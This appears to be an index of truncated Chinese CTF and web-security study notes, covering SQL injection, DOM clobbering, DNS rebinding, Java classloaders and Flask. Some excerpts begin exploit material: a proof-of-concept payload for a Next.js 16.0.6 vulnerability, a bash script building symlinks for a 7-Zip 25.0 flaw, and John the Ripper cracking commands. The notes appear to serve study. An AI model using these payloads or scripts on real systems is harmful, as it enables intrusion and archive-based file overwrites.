Next.js 16.0.6版本漏洞poc 结果会在digest属性中 const payload = { 0: "$1", 1: { status: "resolved_model", reason: 0, _response: "$4", value: '{"then":"$3:map","0":{"then":"$B3"},"length":…

sql注入： CTF·Web基础 | PureStream & Marblue 【超详细版】SQL注入原理及思路绕过(看这篇就够了)-CSDN博客 SQL 注入 - Hello CTF 成因： web应用程序在接收相关数据参数时未做好过滤，将其直接带入到数据库中查询，导致攻击者可以拼接执行构造的SQL语句。 sql语句是什么： 一种关系型数…

john： 破解： john 路径 查看已破解的密码： john --show hashes.txt 使用字典攻击 john --wordlist=password.lst --rules hashes.txt 恢复中断的会话 john --restore 查看状态 john --status 显示所有已破解密码 john --show hashe…

flask 实例： from flask import Flask app = Flask(__name__) @app.route("/") def hello(): return "Hello World!" if __name__ == "__main__": app.run(port=8080) 其他参数： app.run( host='0…

Dom Clobbering 一些预备的知识： window： 是浏览器中全局对象（Global Object）。 所有全局变量、函数、内置对象（如 alert, setTimeout, console）都挂在 window 上。 你可以写 window.alert("Hello") 或直接写 alert("Hello") —— 效果一样。 在浏览…

DNS重绑定 DNS是什么： 互联网中域名与ip地址一一对应，人可以辨认域名（如njupt），机器只能识别ip（如114.5.1.4），而机器对域名解析为ip地址依赖于专门的域名解析服务器来完成，这就是DNS域名服务器。 DNS TTL： 全称是“生存时间（Time To Live)”，简单的说它表示DNS记录在DNS服务器上缓存时间，数值越小，修…

7zip 25.0 漏洞： 脚本： cat > bash.sh << 'EOF' #!/bin/bash BINARYPATH="/tmp/7zz" olddir="$(pwd)" mkdir /tmp/temp tempdir="/tmp/temp" cd "$tempdir" mkdir -p a/b ln -s /a a/b…

java代理 静态代理： 步骤： 定义接口。 编写接口的实现类（目标类）。 编写代理类，实现接口并持有目标类的引用。 在代理类中，通过目标类的引用调用实际的方法。 实例： // 定义接口 public interface Hello { void morning(String name); } // 目标类 public class HelloWo…

java基础 一些基本的：       1：java中文件名要与类名一致       2：编译文件：Java文件运行前需要先编译为 class 字节码文件，如： $ javac HelloWorld.java      //使用javac指令编译，运行javac命令后，如果成功编译没有错误的话，会出现一个 HelloWorld.class 的文件 …

classloader： JVM是什么：类似于翻译器，将同一个java代码翻译给不同的操作系统，以达到通用的效果，如windows适配的JVM可以将java翻译使windows可以运行。 classloader 是什么：将.class加载到JVM中，为节约资源，提高速度和效率，JVM不会一次性将所有类文件加载到内存中，而是根据需要动态加载。 编译过…